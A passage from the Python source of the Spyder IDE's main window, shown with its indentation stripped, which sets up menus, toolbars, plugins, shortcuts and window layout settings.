# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.preferences.appearance import AppearanceConfigPage
from spyder.preferences.general import MainConfigPage
from spyder.preferences.shortcuts import ShortcutsConfigPage
from spyder.preferences.runconfig import RunConfigPage
from spyder.preferences.maininterpreter import MainInterpreterConfigPage
from spyder.preferences.languageserver import LSPManagerConfigPage
self.general_prefs = [MainConfigPage, AppearanceConfigPage,
ShortcutsConfigPage, MainInterpreterConfigPage,
RunConfigPage, LSPManagerConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Quick Layouts and Dialogs
from spyder.preferences.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_interface_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.mem_status = None
self.cpu_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
# Set window title
self.set_window_title()
if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_travis = os.environ.get('TEST_CI_APP', None)
if test_travis is not None:
global MAIN_APP
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(MAIN_APP.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = SPLASH
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.interface_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
# The following flag remembers the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# The following flag is used to restore window's geometry when
# toggling out of fullscreen mode in Windows.
self.saved_normal_geometry = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See issue 4132
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError as e:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: #555555\'><b>netsh winsock reset"
"</b></span><br>"))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# Apply preferences
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def setup(self):
"""Setup main window"""
logger.info("*** Start of MainWindow setup ***")
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
css_path = CSS_PATH
else:
css_path = CSS_PATH
logger.info("Creating core actions...")
self.close_dockwidget_action = create_action(
self, icon=ima.icon('close_pane'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut
)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_interface_action = create_action(
self,
_("Lock panes and toolbars"),
toggled=self.toggle_lock,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_interface_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
# File switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_fileswitcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_sc_to_tip=True)
self.file_toolbar_actions = [self.file_switcher_action,
self.symbol_finder_action]
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
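# Note: the factory above derives the global callback name from the action
# text, e.g. 'Select All' becomes the method name 'selectAll'.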
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
namespace = None
logger.info("Creating toolbars...")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
self.projects_menu.aboutToShow.connect(self.valid_project)
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
logger.info("Creating Tools menu...")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.edit_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_sc_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.path_manager_callback,
tip=_("Python Path Manager"),
menurole=QAction.ApplicationSpecificRole)
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
self.tools_menu_actions += [MENU_SEPARATOR, reset_spyder_action]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"), name)
if qtdact:
break
for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"), name)
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
for act in (qtdact, qtlact):
if act:
additact.append(act)
if additact and is_module_installed('winpython'):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
logger.info("Creating guidata and sift entries...")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see issue 2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except Exception:
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except Exception:
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.fullscreen_action, "_",
"Fullscreen mode", add_sc_to_tip=True)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Internal console plugin
logger.info("Loading internal console...")
from spyder.plugins.console.plugin import Console
self.console = Console(self, namespace, exitfunc=self.closing,
profile=self.profile,
multithreaded=self.multithreaded,
message=_("Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"))
self.console.register_plugin()
# Language Server Protocol Client initialization
self.set_splash(_("Starting Language Server Protocol manager..."))
from spyder.plugins.editor.lsp.manager import LSPManager
self.lspmanager = LSPManager(self)
# Working directory plugin
logger.info("Loading working directory...")
from spyder.plugins.workingdirectory.plugin import WorkingDirectory
self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self)
self.workingdirectory.register_plugin()
self.toolbarslist.append(self.workingdirectory.toolbar)
# Help plugin
if CONF.get('help', 'enable'):
self.set_splash(_("Loading help..."))
from spyder.plugins.help.plugin import Help
self.help = Help(self, css_path=css_path)
self.help.register_plugin()
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer.plugin import OutlineExplorer
self.outlineexplorer = OutlineExplorer(self)
self.outlineexplorer.register_plugin()
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor.plugin import Editor
self.editor = Editor(self)
self.editor.register_plugin()
# Start LSP client
self.set_splash(_("Launching LSP Client for Python..."))
self.lspmanager.start_client(language='python')
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
self.file_menu_actions += [self.file_switcher_action,
self.symbol_finder_action, None,
restart_action, quit_action]
self.set_splash("")
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer.plugin import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
# Figure browser
self.set_splash(_("Loading figure browser..."))
from spyder.plugins.plots.plugin import Plots
self.plots = Plots(self)
self.plots.register_plugin()
# History log widget
if CONF.get('historylog', 'enable'):
self.set_splash(_("Loading history plugin..."))
from spyder.plugins.history.plugin import HistoryLog
self.historylog = HistoryLog(self)
self.historylog.register_plugin()
# IPython console
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole.plugin import IPythonConsole
self.ipyconsole = IPythonConsole(self, css_path=css_path)
self.ipyconsole.register_plugin()
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer.plugin import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
# Online help widget
try: # Qt >= v4.4
from spyder.plugins.onlinehelp.plugin import OnlineHelp
except ImportError: # Qt < v4.4
OnlineHelp = None # analysis:ignore
if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None:
self.set_splash(_("Loading online help..."))
self.onlinehelp = OnlineHelp(self)
self.onlinehelp.register_plugin()
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects.plugin import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles.plugin import FindInFiles
self.findinfiles = FindInFiles(self)
self.findinfiles.register_plugin()
# Load other plugins (former external plugins)
# TODO: Use this loop to load all internal plugins and remove
# duplicated code
other_plugins = ['breakpoints', 'profiler', 'pylint']
for plugin_name in other_plugins:
if CONF.get(plugin_name, 'enable'):
module = importlib.import_module(
'spyder.plugins.{}'.format(plugin_name))
plugin = module.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Third-party plugins
self.set_splash(_("Loading third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Setting up main window..."))
# Help menu
trouble_action = create_action(self,
_("Troubleshooting..."),
triggered=self.trouble_guide)
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
spyder_doc = 'https://docs.spyder-ide.org/'
doc_action = create_action(self, _("Spyder documentation"),
icon=ima.icon('DialogHelpButton'),
triggered=lambda:
programs.start_file(spyder_doc))
self.register_shortcut(doc_action, "_",
"spyder documentation")
if self.help is not None:
tut_action = create_action(self, _("Spyder tutorial"),
triggered=self.help.show_tutorial)
else:
tut_action = None
shortcuts_action = create_action(self, _("Shortcuts Summary"),
shortcut="Meta+F1",
triggered=self.show_shortcuts_dialog)
#----- Tours
self.tour = tour.AnimatedTour(self)
self.tours_menu = QMenu(_("Interactive tours"), self)
self.tour_menu_actions = []
# TODO: Only show intro tour for now. When we are close to finishing
# 3.0, we will finish and show the other tours
self.tours_available = tour.get_tours(0)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
def trigger(i=i, self=self): # closure needed!
return lambda: self.show_tour(i)
temp_action = create_action(self, tour_name, tip="",
triggered=trigger())
self.tour_menu_actions += [temp_action]
self.tours_menu.addActions(self.tour_menu_actions)
self.help_menu_actions = [doc_action, tut_action, shortcuts_action,
self.tours_menu,
MENU_SEPARATOR, trouble_action,
report_action, dep_action,
self.check_updates_action, support_action,
MENU_SEPARATOR]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
if not API == 'pyside':
slot=lambda _checked, path=path: programs.start_file(path)
else:
slot=lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
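# The pattern above matches doc files such as 'NumPy-ref.pdf'
# (hypothetical example), capturing the leading package name in the
# first group.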
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"), self)
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
webres_actions.insert(8, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.about)
self.help_menu_actions += [MENU_SEPARATOR, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.apply_statusbar_settings()
# ----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_interface_action,
self.close_dockwidget_action,
self.maximize_action,
MENU_SEPARATOR))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (MENU_SEPARATOR,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
MENU_SEPARATOR,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Apply all defined shortcuts (plugins + 3rd-party plugins)
self.apply_shortcuts()
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
logger.info("Setting up window...")
self.setup_layout(default=False)
# Show and hide shortcuts in menus for Mac.
# This is a workaround because we can't disable shortcuts
# by setting context=Qt.WidgetShortcut there
if sys.platform == 'darwin':
for name in ['file', 'edit', 'search', 'source', 'run', 'debug',
'projects', 'tools', 'plugins']:
menu_object = getattr(self, name + '_menu')
menu_object.aboutToShow.connect(
lambda name=name: self.show_shortcuts(name))
menu_object.aboutToHide.connect(
lambda name=name: self.hide_shortcuts(name))
if self.splash is not None:
self.splash.hide()
# Enabling tear off for all menus except help menu
if CONF.get('main', 'tear_off_menus'):
for child in self.menuBar().children():
if isinstance(child, QMenu) and child != self.help_menu:
child.setTearOffEnabled(True)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
self.restore_scrollbar_position.emit()
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# In Mac OS X 10.7 our app is not displayed after being initialized (it's
# not clear why, because this doesn't happen when started from the
# terminal), so we need to resort to this hack to make it appear.
if running_in_mac_app():
idx = __file__.index(MAC_APP_NAME)
app_path = __file__[:idx]
subprocess.call(['open', app_path + MAC_APP_NAME])
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
# Update lock status
self.lock_interface_action.setChecked(self.interface_locked)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole.isvisible:
self.historylog.add_history(get_conf_path('history.py'))
if self.open_project:
self.projects.open_project(self.open_project)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files()
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates(startup=True)
# Show dialog with missing dependencies
self.report_missing_dependencies()
# Raise the menuBar to the top of the main window widget's stack
# (Fixes issue 3887)
self.menuBar().raise_()
self.is_setting_up = False
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
missing_deps = dependencies.missing_dependencies()
if missing_deps:
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""Load window layout settings from userconfig-based configuration
with *prefix*, under *section*
default: if True, do not restore inner layout"""
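# Settings are read from keys named '<prefix>size', '<prefix>position',
# '<prefix>state', etc., e.g. 'window/size' when called from setup_layout().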
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix+'size')
prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix+'state', None)
pos = get_func(section, prefix+'position')
# It's necessary to verify if the window/position value is valid
# with the current screen. See issue 3748
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix+'position')
is_maximized = get_func(section, prefix+'is_maximized')
is_fullscreen = get_func(section, prefix+'is_fullscreen')
return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \
is_fullscreen
def get_window_settings(self):
"""Return current window settings
Symmetric to the 'set_window_settings' setter"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""Set window settings
Symmetric to the 'get_window_settings' accessor"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
